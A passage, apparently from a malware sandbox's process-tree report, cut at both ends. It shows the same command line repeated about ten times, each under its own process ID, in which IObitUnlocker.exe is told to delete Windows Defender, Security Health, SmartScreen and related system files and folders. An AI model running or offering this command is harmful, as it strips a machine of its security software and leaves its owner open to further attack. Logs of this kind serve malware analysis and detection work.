Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6692
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6200
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6808
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5804
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7116
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7140
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5880
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6544
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 